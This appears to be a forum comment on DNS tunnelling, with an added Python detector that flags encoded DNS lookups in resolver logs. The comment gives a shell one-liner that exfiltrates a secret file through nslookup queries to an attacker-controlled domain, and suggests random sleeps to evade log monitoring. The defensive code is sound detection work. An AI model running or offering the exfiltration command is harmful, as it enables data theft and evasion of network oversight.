Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server.
It's even easier than that if you just want to sneak a relatively small file out.
for n in $(base64 mysecretfile|sed 's/.\{63\}/&\n/g'); do nslookup $n.myevildomain.com; done
Then get the file out of your evil DNS server logs at the other end. Of course this depends on how much DNS logging the local site is doing and if anyone is paying attention to those logs, but a few random sleeps should help there.
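The comment's caveat about DNS logging, seen from the defender's side, as an added example that is not part of the original comment: it groups resolver log queries by parent domain and counts distinct long, high-entropy first labels over the whole window, so lookups spread out in time still add up. The log line format, the thresholds, the function names and the `tunnel.example` domain are assumptions made for illustration.

```python
import base64, hashlib, math
from collections import Counter, defaultdict

def shannon_entropy(s):
    """Bits of entropy per character of s."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def parent_domain(qname):
    # Assumption: the last two labels form the registered domain.
    # Real deployments should consult the Public Suffix List.
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])

def suspicious_parents(log_lines, min_len=40, min_entropy=4.0, min_unique=3):
    """Map parent domain -> number of distinct long, high-entropy first labels.

    Counting covers the whole log window rather than a per-second rate,
    so lookups spaced out with sleeps are still grouped together.
    """
    seen = defaultdict(set)
    for line in log_lines:
        fields = line.split()
        if len(fields) != 3:
            continue  # skip malformed lines
        qname = fields[2]
        label = qname.split(".")[0]
        if len(label) >= min_len and shannon_entropy(label) >= min_entropy:
            seen[parent_domain(qname)].add(label)
    return {p: len(v) for p, v in seen.items() if len(v) >= min_unique}

def constructed_label(i):
    # Constructed stand-in for one 60-character base64 chunk.
    return base64.b64encode(hashlib.sha512(bytes([i])).digest()[:45]).decode()

# Constructed log: "<time> <client> <qname>", encoded lookups minutes apart.
SAMPLE_LOG = [
    "09:00:01 10.0.0.5 www.example.com",
    "09:00:02 10.0.0.7 mail.example.com",
] + [
    f"09:{7 * i:02d}:13 10.0.0.9 {constructed_label(i)}.tunnel.example"
    for i in range(1, 6)
] + ["09:40:00 10.0.0.5 www.example.com"]

if __name__ == "__main__":
    print(suspicious_parents(SAMPLE_LOG))
```

The thresholds need tuning against a site's own baseline, since some legitimate services also put long encoded labels in query names.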